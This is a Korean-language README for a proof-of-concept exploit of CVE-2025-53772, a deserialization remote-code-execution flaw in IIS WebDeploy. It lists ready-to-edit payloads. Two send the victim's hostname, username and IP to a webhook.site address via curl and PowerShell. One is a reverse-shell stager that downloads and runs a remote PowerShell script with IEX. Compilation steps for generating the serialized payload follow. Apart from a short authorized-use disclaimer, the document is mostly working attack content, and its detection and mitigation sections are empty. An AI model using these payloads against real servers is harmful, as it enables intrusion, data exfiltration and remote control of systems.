
CVE-2025-53772에 대한 개념 증명 익스플로잇, IIS WebDeploy의 안전하지 않은 역직렬화를 통한 원격 코드 실행 취약점입니다. 정보 수집, 명령 실행, 리버스 셸을 위한 사용자 정의 가능한 페이로드 생성을 포함합니다.
이 저장소는 CVE-2025-53772에 대한 개념 증명(PoC) 익스플로잇을 포함합니다. 이는 IIS WebDeploy의 안전하지 않은 역직렬화를 통한 원격 코드 실행 취약점입니다.
이 도구는 교육 및 승인된 보안 테스트 목적으로만 사용됩니다. 저자는 이 소프트웨어로 인한 오용이나 손해에 대해 책임을 지지 않습니다. 소유하고 있거나 테스트할 명시적 권한이 있는 시스템에서만 사용하십시오.
poc.cs 파일의 18-19행에서 페이로드를 편집하여 대상 작업을 지정하십시오:
// Replace with your webhook URL and desired payload
set.Add("cmd.exe");
set.Add("/c curl -X POST https://webhook.site/YOUR-WEBHOOK-ID -H \"Content-Type: application/json\" -d \"{\\\"hostname\\\":\\\"%COMPUTERNAME%\\\",\\\"user\\\":\\\"%USERNAME%\\\",\\\"ip\\\":\\\"$(curl -s ifconfig.me)\\\",\\\"exploit\\\":\\\"CVE-2025-53772\\\",\\\"timestamp\\\":\\\"%DATE% %TIME%\\\"}\"");
정보 수집 (권장):
set.Add("powershell.exe");
set.Add("-Command \"$hostname=$env:COMPUTERNAME; $user=$env:USERNAME; $ip=(Invoke-RestMethod -Uri 'https://ipinfo.io/ip' -UseBasicParsing); $body=@{hostname=$hostname;user=$user;ip=$ip;exploit='CVE-2025-53772';timestamp=(Get-Date)} | ConvertTo-Json; Invoke-RestMethod -Uri 'https://webhook.site/YOUR-WEBHOOK-ID' -Method Post -Body $body -ContentType 'application/json'\"");
간단한 명령 실행:
set.Add("cmd.exe");
set.Add("/c calc.exe"); // Opens calculator
리버스 쉘 (고급):
set.Add("powershell.exe");
set.Add("-Command \"IEX (New-Object Net.WebClient).DownloadString('http://YOUR-SERVER/shell.ps1')\"");
GitHub Action이 자동으로 PoC를 컴파일하고 Base64로 인코딩된 페이로드를 생성합니다:
🎯 취약점 세부 정보
GitHub Actions 대신 로컬에서 컴파일하려면:
# Windows with .NET Framework
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe poc.cs
poc.exe > payload.txt
## Or with Visual Studio
csc poc.cs
poc.exe
📡 웹훅 설정
탐지:
완화: